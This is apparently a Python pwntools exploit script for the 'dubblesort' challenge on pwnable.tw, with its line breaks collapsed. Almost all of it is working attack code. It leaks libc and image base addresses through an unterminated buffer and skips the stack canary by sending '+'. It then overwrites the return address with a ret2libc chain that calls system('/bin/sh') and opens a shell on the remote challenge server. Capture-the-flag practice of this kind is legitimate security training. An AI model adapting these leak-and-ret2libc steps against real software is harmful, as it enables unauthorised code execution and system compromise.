from pwn import * import os import struct import random import time import sys import signal
salt = ''
def clear(signum=None, stack=None): print('Strip all debugging information') os.system('rm -f /tmp/gdb_symbols{}* /tmp/gdb_pid{}* /tmp/gdb_script{}* .payload.sw*'.replace('{}', salt)) exit(0)
for sig in [signal.SIGINT, signal.SIGHUP, signal.SIGTERM]: signal.signal(sig, clear)
try: gdb_symbols = ''' '''
f = open('/tmp/gdb_symbols{}.c'.replace('{}', salt), 'w') f.write(gdb_symbols) f.close() os.system('gcc -g -shared /tmp/gdb_symbols{}.c -o /tmp/gdb_symbols{}.so'.replace('{}', salt)) except Exception as e: print(e)
context.arch = "i386" context.log_level = 'debug' execve_file = './dubblesort'
sh = process(execve_file) sh = remote('chall.pwnable.tw', 10101) elf = ELF(execve_file) libc = ELF('./libc-2.23.so')
try: gdbscript = ''' b *$rebase(0xAFE) b *$rebase(0xB17) '''
f = open('/tmp/gdb_pid{}'.replace('{}', salt), 'w') f.write(str(proc.pidof(sh)[0])) f.close()
f = open('/tmp/gdb_script{}'.replace('{}', salt), 'w') f.write(gdbscript) f.close() except Exception as e: print(e)
sh.send('a' * 0x19)
sh.recvuntil('a' * 0x18) libc_addr = (u32(sh.recvn(4)) & 0xfffff000) - 0x1b0000 log.success('libc_addr: ' + hex(libc_addr))
sh.recvn(4) image_addr = u32(sh.recvn(4)) - 0x601 log.success('image_addr: ' + hex(image_addr))
sh.sendlineafter('How many numbers do you what to sort :', '35') for i in range(24): sh.sendlineafter('number : ', str(1))
sh.sendlineafter('number : ', '+')
for i in range(9): sh.sendlineafter('number : ', str(libc_addr + libc.symbols['system']))
sh.sendlineafter('number : ', str(libc_addr + libc.search('/bin/sh\0').next()))
sh.interactive() clear()
|